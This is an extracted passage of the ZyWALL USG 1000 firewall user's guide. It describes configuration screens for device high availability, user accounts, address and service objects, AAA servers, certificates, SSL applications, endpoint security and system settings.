Page 683: ...This field is available for a backup ZyWALL Select this if this ZyWALL should become the master ZyWALL if a lower priority ZyWALL is the master when this one is enabled If the role is master the ZyWALL preempts by default Cluster Settings Cluster ID Type the cluster ID number A virtual router consists of a master ZyWALL and all of its backup ZyWALLs If you have multiple ZyWALL virtual routers on y...

Page 684: ...synchronization to have a backup ZyWALL copy the master ZyWALL s configuration certificates AV signatures IDP and application patrol signatures and system protect signatures Every interface s management IP address must be in the same subnet as the interface s IP address the virtual router IP address Server Address If this ZyWALL is set to backup role enter the IP address or Fully Qualified Domain ...

Page 685: ...he same password If you leave this field blank in the master ZyWALL no backup ZyWALLs can synchronize from it If you leave this field blank in a backup ZyWALL it cannot synchronize from the master ZyWALL Auto Synchronize Select this to get the updated configuration automatically from the specified ZyWALL according to the specified Interval The first synchronization begins after the specified Inter...

Page 686: ...interfaces or disable the bridge interfaces connect the bridge interfaces activate device HA and finally reactivate the bridge interfaces Virtual Router IP VRIP Subnet Mask This is the interface s static IP address and subnet mask in the virtual router Whichever ZyWALL is currently serving as the master uses this virtual router IP address and subnet mask These fields are blank if the interface is ...

Page 687: ...es that have static IP addresses You can only enable one VRRP group for each interface and you can only have one active VRRP group for each virtual router If you create a VRRP group for an Ethernet interface that has a VLAN interface configured on it make sure you create a separate VRRP group for the VLAN interface This will avoid an IP conflict if the backup ZyWALL takes over for the master When ...

Page 688: ...183 Configuration Device HA Legacy Mode LABEL DESCRIPTION General Settings Link Monitoring Enable link monitoring to have the master ZyWALL shut down all of its VRRP interfaces if one of its VRRP interface links goes down This way the backup ZyWALL takes over all of the master ZyWALL s functions Stop Cellular interfaces while one of monitored interface is fault Select this to have the master ZyWAL...

Page 689: ...rtual Router IP Netmask This is the interface s IP address and subnet mask in the virtual router Management IP Netmask This field displays the management IP address and subnet mask of an interface Synchronization Server Address Enter the IP address or Fully Qualified Domain Name FQDN of the ZyWALL from which to get configuration and subscription service updates for services to which the backup ZyW...

Page 690: ...et configuration and subscription service updates automatically from the specified ZyWALL according to the specified Interval The first synchronization begins after the specified Interval the ZyWALL does not synchronize immediately Interval This field is only available if Auto Synchronize is checked Type the number of minutes to wait between synchronizations Apply switch to Legacy Mode This appear...

Page 691: ...ace s IP address for management access You can use this IP address to access the ZyWALL whether it is the master or a backup This management IP address should be in the same subnet as the interface IP address so the backup ZyWALL cannot synchronize with the master via this VRRP interface Manage IP Subnet Mask Enter the subnet mask of the interface s management IP address Role Select the role that ...

Page 692: ...thod and password Choices are None this virtual router does not use any authentication method Text this virtual router uses a plain text password for authentication Type the password in the field next to the radio button The password can consist of alphanumeric characters the underscore and some punctuation marks and it can be up to eight characters long IP AH MD5 this virtual router uses an encry...

Page 693: ...ZyWALL B are not connected 2 Configure the bridge interface on the master ZyWALL set the bridge interface as a monitored interface and activate device HA 3 Configure the bridge interface on the backup ZyWALL set the bridge interface as a monitored interface and activate device HA B A B A Br0 ge4 ge5 B A Br0 ge4 ge5 Br0 ge4 ge5 ...

Page 694: ... interfaces activate device HA and finally reactivate the bridge interfaces as shown in the following example 1 In this case the ZyWALLs are already connected but the bridge faces have not been configured yet Configure a disabled bridge interface on the master ZyWALL but disable it Then set the bridge interface as a monitored interface and activate device HA B A Br0 ge4 ge5 Br0 ge4 ge5 B A Br0 ge4...

Page 695: ...ce on the backup ZyWALL Then set the bridge interface as a monitored interface and activate device HA 3 Enable the bridge interface on the master ZyWALL and then on the backup ZyWALL 4 Connect the ZyWALLs B A Br0 ge4 ge5 Br0 ge4 ge5 Disabled Disabled B A Br0 ge4 ge5 Br0 ge4 ge5 B A Br0 ge4 ge5 Br0 ge4 ge5 ...

Page 696: ...P address as the default gateway and forwards traffic for the network ZyWALL B is a backup It is using its management IP address 192 168 10 112 ZyWALL A sends regular messages to ZyWALL B to let ZyWALL B know that ZyWALL A is available If ZyWALL A becomes unavailable it stops sending messages to ZyWALL B ZyWALL B detects this and assumes the role of the master This is illustrated below Figure 453 ...

Page 697: ... still recommended that the backup ZyWALL synchronize with a master ZyWALL on a secure network The backup ZyWALL gets the configuration from the master ZyWALL The backup ZyWALL cannot become the master or be managed while it applies the new configuration This usually takes two or three minutes or longer depending on the configuration complexity The following restrictions apply with active passive ...

Page 698: ...Chapter 39 Device HA ZyWALL USG 1000 User s Guide 698 ...

Page 699: ...s users and other user groups You cannot put admin users in user groups The Setting screen see Section 40 4 on page 707 controls default settings login settings lockout settings and other user settings for the ZyWALL You can also use this screen to specify when users must log in to the ZyWALL before it routes traffic for them 40 1 2 What You Need To Know User Account A user account defines the pri...

Page 700: ...respectively Note If the ZyWALL tries to authenticate an ext user using the local database the attempt always fails Once an ext user user has been authenticated the ZyWALL tries to get the user type see Table 185 on page 699 from the external server If the external server does not have the information the ZyWALL sets the user type for this session to User For the rest of the user attributes such a...

Page 701: ...er group The sequence of members in a user group is not important User Awareness By default users do not have to log into the ZyWALL to use the network services it provides The ZyWALL automatically routes packets for everyone If you want to restrict network services that certain users can use via the ZyWALL you can require them to log in to the ZyWALL first The ZyWALL is then aware of the user who...

Page 702: ...ng characters Alphanumeric A z 0 9 there is no unicode support _ underscores Table 186 Configuration Object User Group LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so O...

Page 703: ...FS or FTP it will use the account settings used for BOB not bob User names have to be different than user group names Here are the reserved user names To access this screen go to the User screen see Section 40 2 on page 702 and click either the Add icon or an Edit icon Figure 455 Configuration User Group User Add adm admin any bin daemon debug devicehaecived ftp games halt ldap users lp mail news ...

Page 704: ... alphanumeric characters Retype This field is not available if you select the ext user or ext group user type Group Identifier This field is available for a ext group user type user account Specify the value of the AD or LDAP server s Group Membership Attribute that identifies the group to which this user belongs Associated AAA Server Object This field is available for a ext group user type user a...

Page 705: ...number of minutes unlimited Unlike Lease Time the user has no opportunity to renew the session without logging out Configuration Validation Use a user account from the group specified above to test if the configuration is correct Enter the account s user name in the User Name field and click Test OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without sa...

Page 706: ...his field displays the name of each user group Description This field displays the description for each user group Member This field lists the members in the user group Each member is separated by a comma Table 188 Configuration Object User Group Group continued LABEL DESCRIPTION Table 189 Configuration User Group Group Add LABEL DESCRIPTION Name Type the name for this user group You may use 1 31 ...

Page 707: ... been added to the user group The order of members is not important Select users and groups from the Available list that you want to be members of this group and move them to the Member list You can double click a single entry to move it or use the Shift or Ctrl key to select multiple entries and use the arrow button to move them Move any members you do not want included to the Available list OK C...

Page 708: ...hentication Timeout Settings Default Authentication Timeout Settings These authentication timeout settings are used by default when you create a new user account They also control the settings for any existing user accounts that are set to use the default settings You can still manually configure any user account s authentication timeout settings Edit Double click an entry or select it and click E...

Page 709: ...cally see Section 40 4 on page 707 the users can select this check box on their screen as well In this case the session is automatically renewed before the lease time expires Reauthentication Time This is the default reauthentication time in minutes for each type of user account It defines the number of minutes the user can be logged into the ZyWALL in one session before having to log in again Unl...

Page 710: ...t on the number of simultaneous logins by non admin users If you do not select this access users can login as many times as they want as long as they use different IP addresses Maximum number per access account This field is effective when Limit for access account is checked Type the maximum number of simultaneous logins by each access user User Lockout Settings Enable logon retry limit Select thi...

Page 711: ...ntained in a remote server such as RADIUS or LDAP See Ext Group User Accounts on page 701 for more information about this type Lease Time Enter the number of minutes this type of user account has to renew the current session before the user is logged out You can specify 1 to 1440 minutes You can enter 0 to make the number of minutes unlimited Admin users renew the session every time the main scree...

Page 712: ...ically logs them out The ZyWALL sets this amount of time according to the User defined lease time field in this screen Lease time field in the User Add Edit screen see Section 40 2 1 on page 702 Lease time field in the Setting screen see Section 40 4 on page 707 Updating lease time automatically This box appears if you checked the Allow renewing lease time automatically box in the Setting screen S...

Page 713: ...ge number of Ext User accounts you might use CLI commands instead of the Web Configurator to create the accounts Extract the user names from the LDAP or RADIUS server and create a shell script that creates the user accounts See Chapter 52 on page 863 for more information about shell scripts Table 193 LDAP RADIUS Keywords for User Attributes KEYWORD CORRESPONDING ATTRIBUTE IN WEB CONFIGURATOR type ...

Page 714: ...Chapter 40 User Group ZyWALL USG 1000 User s Guide 714 ...

Page 715: ... dynamic routes firewall rules application patrol content filtering and VPN connection policies For example addresses are used to specify where content restrictions apply in content filtering Please see the respective sections for more information about how address objects and address groups are used in each one Address groups are composed of address objects and address groups The sequence of memb...

Page 716: ...ick this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an exam...

Page 717: ...s subnet or gateway if the interface s IP address settings change For example if you change ge1 s IP address the ZyWALL automatically updates the corresponding interface based LAN subnet address object IP Address This field is only available if the Address Type is HOST This field cannot be blank Enter the IP address that this address object represents Starting IP Address This field is only availab...

Page 718: ...epresents OK Click OK to save your changes back to the ZyWALL Cancel Click Cancel to exit this screen without saving your changes Table 195 Configuration Object Address Address Edit continued LABEL DESCRIPTION Table 196 Configuration Object Address Address Group LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the en...

Page 719: ...dashes but the first character cannot be a number This value is case sensitive Description This field displays the description of each address group if any You can use up to 60 characters punctuation marks and spaces Member List The Member list displays the names of the address and address group objects that have been added to the address group The order of members is not important Select items fr...

Page 720: ...Chapter 41 Addresses ZyWALL USG 1000 User s Guide 720 ...

Page 721: ...level protocol that is sent in this packet This section discusses three of the most common IP protocols Computers use Transmission Control Protocol TCP IP protocol 6 and User Datagram Protocol UDP IP protocol 17 to exchange data with each other TCP guarantees reliable delivery but is slower and more complex Some uses are FTP HTTP SMTP and TELNET UDP is simpler and faster but is less reliable Some ...

Page 722: ...IP protocols TCP applications UDP applications ICMP messages user defined services for other types of IP protocols These objects are used in policy routes firewall rules and IDP profiles Use service groups when you want to create the same rule for several services instead of creating separate rules for each service Service groups may consist of services and other service groups The sequence of mem...

Page 723: ...ouble click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value ...

Page 724: ... may use 1 31 alphanumeric characters underscores _ or dashes but the first character cannot be a number This value is case sensitive IP Protocol Select the protocol the service uses Choices are TCP UDP ICMP and User Defined Starting Port Ending Port This field appears if the IP Protocol is TCP or UDP Specify the port number s used by this service If you fill in one of these fields the service use...

Page 725: ...ick Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value and it is not associated with a specific...

Page 726: ... underscores _ or dashes but the first character cannot be a number This value is case sensitive Description Enter a description of the service group if any You can use up to 60 printable ASCII characters Member List The Member list displays the names of the service and service group objects that have been added to the service group The order of members is not important Select items from the Avail...

Page 727: ...of all schedules in the ZyWALL Use the One Time Schedule Add Edit screen Section 43 2 1 on page 729 to create or edit a one time schedule Use the Recurring Schedule Add Edit screen Section 43 2 2 on page 730 to create or edit a recurring schedule 43 1 2 What You Need to Know One time Schedules One time schedules begin on a specific start date and time and end on a specific stop date and time One t...

Page 728: ...nfiguration Object Schedule LABEL DESCRIPTION One Time Add Click this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which sett...

Page 729: ... confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This field is a sequential value and it is not associated with a specific schedule Name This field displays the name of the schedule which is used to refer to the schedule Start Time This...

Page 730: ...l dates such as February 31 Hour 0 23 Minute 0 59 StartTime Specify the hour and minute when the schedule begins Hour 0 23 Minute 0 59 StopDate Specify the year month and day when the schedule ends Year 1900 2999 Month 1 12 Day 1 31 it is not possible to specify illegal dates such as February 31 Hour 0 23 Minute 0 59 StopTime Specify the hour and minute when the schedule ends Hour 0 23 Minute 0 59...

Page 731: ...ing LABEL DESCRIPTION Configuration Name Type the name used to refer to the recurring schedule You may use 1 31 alphanumeric characters underscores _ or dashes but the first character cannot be a number This value is case sensitive Date Time StartTime Specify the hour and minute when the schedule begins each day Hour 0 23 Minute 0 59 StopTime Specify the hour and minute when the schedule ends each...

Page 732: ...Chapter 43 Schedules ZyWALL USG 1000 User s Guide 732 ...

Page 733: ...see Chapter 45 on page 743 44 1 1 Directory Service AD LDAP LDAP AD allows a client the ZyWALL to connect to a server to retrieve information from a directory A network example is shown next Figure 474 Example Directory Service Client and Server The following describes the user authentication procedure via an LDAP AD server 1 A user logs in with a user name and password pair 2 The ZyWALL tries to ...

Page 734: ... feature Purchase a ZyWALL OTP package in order to use this feature The package contains server software and physical OTP tokens PIN generators Do the following to use OTP See the documentation included on the ASAS CD for details 1 Install the ASAS server software on a computer 2 Create user accounts on the ZyWALL and in the ASAS server 3 Import each token s database file located on the included C...

Page 735: ...nticate VPN users Directory Service LDAP AD LDAP Lightweight Directory Access Protocol AD Active Directory is a directory service that is both a directory and a protocol for controlling access to a network The directory consists of a database specialized for fast information retrieval and filtering activities You create and store user profile and login information on the external server RADIUS RAD...

Page 736: ...any c JP Base DN A base DN specifies a directory A base DN usually contains information such as the name of an organization a domain name and or country For example o MyCompany c UK where o means organization and c means country Bind DN A bind DN is used to authenticate with an LDAP AD server For example a bind DN of cn zywallAdmin allows the ZyWALL to log into the LDAP AD server using the user na...

Page 737: ...Server Click Object AAA Server Active Directory or LDAP to display the Active Directory or LDAP screen Click the Add icon or an Edit icon to display the Table 205 Configuration Object AAA Server Active Directory or LDAP LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To r...

Page 738: ...N Name Enter a descriptive name up to 63 alphanumerical characters for identification purposes Description Enter the description of each server if any You can use up to 60 printable ASCII characters Server Address Enter the address of the AD or LDAP server Backup Server Address If the AD or LDAP server has a backup server enter its address here Port Specify the port number on the AD or LDAP server...

Page 739: ...ogin Name Attribute Enter the type of identifier the users are to use to log in For example name or e mail address Alternative Login Name Attribute If there is a second type of identifier that the users can use to log in enter it here For example name or e mail address Group Membership Attribute An AD or LDAP server defines attributes for its accounts Enter the name of the attribute that the ZyWAL...

Page 740: ...he address of the AD or LDAP server Base DN This specifies a directory For example o ZyXEL c US Host Enter the IP address in dotted decimal notation or the domain name up to 63 alphanumeric characters of a RADIUS server Authentication Port The default port of the RADIUS server for authentication is 1812 You need not change this value unless your network administrator instructs you to do so with ad...

Page 741: ... LABEL DESCRIPTION Name Enter a descriptive name up to 63 alphanumerical characters for identification purposes Description Enter the description of each server if any You can use up to 60 printable ASCII characters Server Address Enter the address of the RADIUS server Authentication Port Specify the port number on the RADIUS server to which the ZyWALL sends authentication requests Enter a number ...

Page 742: ...es attributes for its accounts Select the name and number of the attribute that the ZyWALL is to check to determine to which group a user belongs If it does not display select user defined and specify the attribute s number This attribute s value is called a group identifier it determines to which group a user belongs You can add ext group user user objects to identify groups based on these group ...

Page 743: ...h Method screens Section 45 2 on page 744 to create and manage authentication method objects Finding Out More See Section 7 6 3 on page 133 for an example of how to set up user authentication using a radius server 45 1 2 Before You Begin Configure AAA server objects see Chapter 44 on page 733 before you configure authentication method objects 45 1 3 Example Selecting a VPN Authentication Method Af...

Page 744: ... create up to 16 authentication method objects Figure 482 Configuration Object Auth Method The following table describes the labels in this screen Table 209 Configuration Object Auth Method LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to open a screen where you can modify the entry s settings Remove To remove an entry select it and c...

Page 745: ...lumn is important The ZyWALL authenticates the users using the databases in the local user database or the external authentication server in the order they appear in this screen If two accounts with the same username exist on two authentication servers you specify the ZyWALL does not continue the search on the second authentication server when you enter the username and password that doesn t match...

Page 746: ...yWALL confirms you want to remove it before doing so Move To change a method s position in the numbered list select the method and click Move to display a field to type a number for where you want to put it and press ENTER to move the rule to the number that you typed The ordering of your methods is important as ZyWALL authenticates the users using the authentication methods in the order they appe...

Page 747: ...7 Add icon Click Add to add a new entry Click Edit to edit the settings of an entry Click Delete to delete an entry OK Click OK to save the changes Cancel Click Cancel to discard the changes Table 210 Configuration Object Auth Method Add continued LABEL DESCRIPTION ...

Page 748: ...Chapter 45 Authentication Method ZyWALL USG 1000 User s Guide 748 ...

Page 749: ...d certificate It also trusts any valid certificate signed by any of the certificates that you have imported as a trusted certificate 46 1 2 What You Need to Know When using public key cryptology for authentication each host has two keys One key is public and can be made openly available The other key is private and must be kept secure These keys work like a handwritten signature in fact certificat...

Page 750: ...lgorithm The certification authority uses its private key to sign certificates Anyone can then use the certification authority s public key to verify the certificates A certification path is the hierarchy of certification authority certificates that validate a certificate The ZyWALL does not trust a certificate if any certificate on its path has expired or been revoked Certification authorities ma...

Page 751: ...s and numerals to convert a binary PKCS 7 certificate into a printable form Binary PKCS 12 This is a format for transferring public key and private key certificates The private key in a PKCS 12 file is within a password encrypted envelope The file s password is not connected to your certificate s public or private passwords Exporting a PKCS 12 file creates this and you must provide it to decrypt t...

Page 752: ...pen the Certificate window Click the Details tab and scroll down to the Thumbprint Algorithm and Thumbprint fields Figure 485 Certificate Details 4 Use a secure method to verify that the certificate owner has the same information in the Thumbprint Algorithm and Thumbprint fields The secure method may very based on your situation Possible examples would be over the telephone or through an HTTPS con...

Page 753: ...ate or a certification request Edit Double click an entry or select it and click Edit to open a screen with an in depth list of information about the certificate Remove The ZyWALL keeps all of your certificates unless you specifically delete them Uploading a new firmware or default configuration file does not delete your certificates To remove an entry select it and click Remove The ZyWALL confirm...

Page 754: ...such as CN Common Name OU Organizational Unit or department O Organization or company and C Country It is recommended that each certificate have unique subject information Issuer This field displays identifying information about the certificate s issuing certification authority such as a common name organizational unit or department organization or company and country With self signed certificates...

Page 755: ... ZyWALL USG 1000 User s Guide 755 ZyWALL create a self signed certificate enroll a certificate with a certification authority or generate a certification request Figure 487 Configuration Object Certificate My Certificates Add ...

Page 756: ...hich the certificate owner belongs You can use up to 31 characters You can use alphanumeric characters the hyphen and the underscore Organization Identify the company or group to which the certificate owner belongs You can use up to 31 characters You can use alphanumeric characters the hyphen and the underscore Town City Identify the town or city where the certificate owner is located You can use ...

Page 757: ...hen you select Create a certification request and enroll for a certificate immediately online Select the certification authority s enrollment protocol from the drop down list box Simple Certificate Enrollment Protocol SCEP is a TCP based enrollment protocol that was developed by VeriSign and Cisco Certificate Management Protocol CMP is a TCP based enrollment protocol that was developed by the Publ...

Page 758: ...you select Create a certification request and enroll for a certificate immediately online the certification authority may want you to include a reference number and key to identify you when you send a certification request Fill in both the Reference Number and the Key fields if your certification authority uses the CMP enrollment protocol Just the Key field displays if your certification authority...

Page 759: ...t Screen Click Configuration Object Certificate My Certificates and then the Edit icon to open the My Certificate Edit screen You can use this screen to view in depth certificate information and change the certificate s name Figure 488 Configuration Object Certificate My Certificates Edit ...

Page 760: ...rtificate s owner signed the certificate not a certification authority X 509 means that this certificate was created and signed according to the ITU T X 509 recommendation that defines the formats for public key certificates Version This field displays the X 509 version number Serial Number This field displays the certificate s identification number given by the certification authority or generate...

Page 761: ...ficate into a printable form You can copy and paste a certification request into a certification authority s web page an e mail that you send to the certification authority or a text editor and save the file on a management computer for later manual enrollment You can copy and paste a certificate into an e mail to send to friends or colleagues or you can copy and paste a certificate into a text ed...

Page 762: ...reen You must remove any spaces from the certificate s filename before you can import it Figure 489 Configuration Object Certificate My Certificates Import The following table describes the labels in this screen OK Click OK to save your changes back to the ZyWALL You can only change the name Cancel Click Cancel to quit and return to the My Certificates screen Table 213 Configuration Object Certifi...

Page 763: ...rtificate on the ZyWALL Cancel Click Cancel to quit and return to the My Certificates screen Table 214 Configuration Object Certificate My Certificates Import continued LABEL DESCRIPTION Table 215 Configuration Object Certificate Trusted Certificates LABEL DESCRIPTION PKI Storage Space in Use This bar displays the percentage of the ZyWALL s PKI storage space that is currently in use When the stora...

Page 764: ...ying information about the certificate s owner such as CN Common Name OU Organizational Unit or department O Organization or company and C Country It is recommended that each certificate have unique subject information Issuer This field displays identifying information about the certificate s issuing certification authority such as a common name organizational unit or department organization or co...

Page 765: ...icates ZyWALL USG 1000 User s Guide 765 authority s list of revoked certificates before trusting a certificate issued by the certification authority Figure 491 Configuration Object Certificate Trusted Certificates Edit ...

Page 766: ...SCP or LDAP server details OCSP Server Select this check box if the directory server uses OCSP Online Certificate Status Protocol URL Type the protocol IP address and pathname of the OCSP server ID The ZyWALL may need to authenticate itself in order to assess the OCSP server Type the login name up to 31 ASCII characters from the entity maintaining the server usually a certification authority Passw...

Page 767: ... hash algorithm Valid From This field displays the date that the certificate becomes applicable The text displays in red and includes a Not Yet Valid message if the certificate has not yet become applicable Valid To This field displays the date that the certificate expires The text displays in red and includes an Expiring or Expired message if the certificate is about to expire or has already expi...

Page 768: ...ate Certificate in PEM Base 64 Encoded Format This read only text box displays the certificate or certification request in Privacy Enhanced Mail PEM format PEM uses lowercase letters uppercase letters and numerals to convert a binary certificate into a printable form You can copy and paste the certificate into an e mail to send to friends or colleagues or you can copy and paste the certificate int...

Page 769: ... network traffic since the ZyWALL only gets information on the certificates that it needs to verify not a huge list When the ZyWALL requests certificate status information the OCSP server returns a expired current or unknown response Table 217 Configuration Object Certificate Trusted Certificates Import LABEL DESCRIPTION File Path Type in the location of the file you want to upload in this field o...

Page 770: ...Chapter 46 Certificates ZyWALL USG 1000 User s Guide 770 ...

Page 771: ... Section 13 4 on page 292 for information about PPPoE PPTP interfaces See Section 6 6 on page 112 for related information on these screens 47 1 1 What You Can Do in this Chapter Use the Object ISP Account screens Section 47 2 on page 771 to create and manage ISP accounts in the ZyWALL 47 2 ISP Account Summary This screen provides a summary of ISP accounts in the ZyWALL To access this screen click ...

Page 772: ...to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3 2 on page 291 for an example This ...

Page 773: ...ZyWALL accepts MSCHAP V2 only Encryption Method This field is available if this ISP account uses the PPTP protocol Use the drop down list box to select the type of Microsoft Point to Point Encryption MPPE Options are nomppe This ISP account does not use MPPE mppe 40 This ISP account uses 40 bit MPPE mppe 128 This ISP account uses 128 bit MMPE User Name Type the user name given to you by your ISP P...

Page 774: ...disconnects from the PPPoE PPTP server This value must be an integer between 0 and 360 If this value is zero this timeout is disabled OK Click OK to save your changes back to the ZyWALL If there are no errors the program returns to the ISP Account screen If there are errors a message box explains the error and the program stays in the ISP Account Edit screen Cancel Click Cancel to return to the IS...

Page 775: ...emote users to access an application via standard web browsers Section 48 2 1 on page 778 You can also use the SSL Application Edit screen to specify the name of a folder on a Linux or Windows file server which remote users can access using a standard web browser Section 48 2 2 on page 780 48 1 2 What You Need to Know Application Types You can configure the following types of SSL applications on t...

Page 776: ...ter does not use VNC or RDP client software The ZyWALL works with the following remote desktop connection software RDP Windows Remote Desktop supported in Internet Explorer VNC RealVNC TightVNC UltraVNC For example user A uses an SSL VPN connection to log into the ZyWALL Then he manages LAN computer B which has RealVNC server software installed Figure 495 SSL protected Remote Management Weblinks Y...

Page 777: ...info Select Web Page Encryption to prevent users from saving the web content Click Apply to save the settings The configuration screen should look similar to the following figure Figure 496 Example SSL Application Specifying a Web Site for Access 48 2 The SSL Application Screen The main SSL Application screen displays a list of the configured SSL application objects Click Configuration Object SSL ...

Page 778: ... LABEL DESCRIPTION Add Click this to create a new entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object Reference s Select an entry and click Object References to open a screen that shows which settings use the entry See Section 13 3...

Page 779: ... Virtual Network Computing remote desktop server software installed Select RDP to allow users to manage LAN computers that have Remote Desktop Protocol remote desktop server software installed Select Weblink to create a link to a web site that you expect the SSL VPN users to commonly use Name Enter a descriptive name to identify this object You can enter up to 31 characters 0 9 a z A Z and _ Space...

Page 780: ...s set to RDP or VNC Specify the IP address or Fully Qualified Domain Name FQDN of the computer s that you want to allow the remote users to manage Starting Port Ending Port This field displays if the Server Type is set to RDP or VNC Specify the listening ports of the LAN computer s running remote desktop server software The ZyWALL uses a port number from this range to send traffic to the LAN compu...

Page 781: ... 31 characters 0 9 a z A Z and _ Spaces are not allowed Shared Path Specify the IP address domain name or NetBIOS name computer name of the file server and the name of the share to which you want to allow user access Enter the path in one of the following formats IP address share name domain name share name computer name share name For example if you enter my server Tmp this allows remote users to...

Page 782: ...Chapter 48 SSL Application ZyWALL USG 1000 User s Guide 782 ...

Page 783: ...ndpoint security objects to use with the authentication policy and SSL VPN features For example an authentication policy could use an endpoint security object that requires a LAN user s computer to pass all of the object s checking items in order to access the network LAN user A passes all of the checks and is given access An SSL VPN tunnel could use a different endpoint security profile that only...

Page 784: ...ation Windows registry settings Processes that the endpoint must execute Processes that the endpoint cannot execute The size and version of specific files Multiple Endpoint Security Objects You can configure an authentication policy or SSL VPN policy to use multiple endpoint security objects This allows checking of computers with different OSs or security settings When a client attempts to log in ...

Page 785: ...ry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Object References Select an entry and click Object References to open a screen that shows which settings use the object See Section 13 3 2 on page 291 for an example Object Name This field displays the descriptive name that identifies this object Description If the entry has...

Page 786: ...L USG 1000 User s Guide 786 Apply Click this button to save your changes to the ZyWALL Reset Click this button to return the screen to its last saved settings Table 223 Configuration Object Endpoint Security continued LABEL DESCRIPTION ...

Page 787: ...LL USG 1000 User s Guide 787 49 3 Endpoint Security Add Edit Click Configuration Object Endpoint Security and then the Add or Edit icon to open the Endpoint Security Edit screen Use this screen to configure an endpoint security object ...

Page 788: ...Chapter 49 Endpoint Security ZyWALL USG 1000 User s Guide 788 Figure 502 Configuration Object Endpoint Security Add ...

Page 789: ...ers allows access for computers not using Windows Linux or Mac OSX operating systems For example you create Windows Linux and Mac OSX endpoint security objects to apply to your LAN users An others object allows access for LAN computers using Solaris HP Android or other operating systems Windows Version If you selected Windows as the operating system select the version of Windows here Endpoint must...

Page 790: ...s Registry If you selected Windows as the operating system you can use the table to list Windows registry values to check on the user s computer Use the Operation field to set whether the value for the registry item in the user s computer has to be equal to greater than less than greater than or equal to less than or equal to or not equal to the value listed in the entry Click Add to create a new ...

Page 791: ...be equal to greater than less than greater than or equal to less than or equal to or not equal to the size or version of the file listed in the entry Click Add to create a new entry Select one or more entries and click Remove to delete it or them The user s computer must pass one of the listed file information checks to pass this checking item OK Click OK to save your changes back to the ZyWALL Ca...

Page 792: ...Chapter 49 Endpoint Security ZyWALL USG 1000 User s Guide 792 ...

Page 793: ...omain name to its corresponding IP address and vice versa Use the System WWW screens see Section 50 7 on page 808 to configure settings for HTTP or HTTPS access to the ZyWALL and how the login and access user screens look Use the System SSH screen see Section 50 8 on page 825 to configure SSH Secure SHell used to securely access the ZyWALL s command line interface You can specify which zones allow...

Page 794: ...ge 840 to allow your ZyWALL to be managed by the Vantage CNM server Use the System Language screen see Section 50 14 on page 843 to set a language for the ZyWALL s Web Configurator screens Note See each section for related background information and term definitions 50 2 Host Name A host name is the unique name by which a device is known on a network Click Configuration System Host Name to open th...

Page 795: ...k Apply to save your changes back to the ZyWALL Reset Click Reset to return the screen to its last saved settings Table 225 Configuration System Host Name continued LABEL DESCRIPTION Table 226 Configuration System USB Storage LABEL DESCRIPTION Activate USB storage service Turn USB storage on or off You need to enable USB storage both here and for a specific feature such as system logs or diagnosti...

Page 796: ...time based on your local time zone and date click Configuration System Date Time The screen displays as shown You can manually set the ZyWALL s time and date or have the ZyWALL get the date and time from a time server Figure 505 Configuration System Date and Time The following table describes the labels in this screen Table 227 Configuration System Date and Time LABEL DESCRIPTION Current Time and ...

Page 797: ...ck this button to have the ZyWALL get the time and date from a time server see the Time Server Address field This also saves your changes except the daylight saving settings Time Zone Setup Time Zone Choose the time zone of your location This will set the time difference between your time zone and Greenwich Mean Time GMT Enable Daylight Saving Daylight saving is a period from late spring to early ...

Page 798: ...ing Time ends in the United States on the first Sunday of November Each time zone in the United States stops using Daylight Saving Time at 2 A M local time So in the United States you would select First Sunday November and type 2 in the at field Daylight Saving Time ends in the European Union on the last Sunday of October All of the time zones in the European Union stop using Daylight Saving Time ...

Page 799: ...nfiguring the Date Time screen To manually set the ZyWALL date and time 1 Click System Date Time 2 Select Manual under Time and Date Setup 3 Enter the ZyWALL s time in the New Time field 4 Enter the ZyWALL s date in the New Date field 5 Under Time Zone Setup select your Time Zone from the list 6 As an option you can select the Enable Daylight Saving check box to adjust the ZyWALL clock for dayligh...

Page 800: ...S Overview DNS Domain Name System is for mapping a domain name to its corresponding IP address and vice versa The DNS server is extremely important because without it you must know the IP address of a machine before you can access it Table 229 Configuration System Console Speed LABEL DESCRIPTION Console Port Speed Use the drop down list box to change the speed of the console port Your ZyWALL suppo...

Page 801: ... WAN IP address set the DNS server fields to get the DNS server address from the ISP You can manually enter the IP addresses of other DNS servers 50 6 2 Configuring the DNS Screen Click Configuration System DNS to change your ZyWALL s DNS settings Use the DNS screen to configure the ZyWALL to use a DNS server to resolve domain names for ZyWALL system features like VPN DDNS and the time server You ...

Page 802: ...ne forwarder entries in the order that they appear in this list Add Click this to create a new entry Select an entry and click Add to create a new entry after the selected entry Edit Double click an entry or select it and click Edit to be able to modify the entry s settings Remove To remove an entry select it and click Remove The ZyWALL confirms you want to remove it before doing so Note that subs...

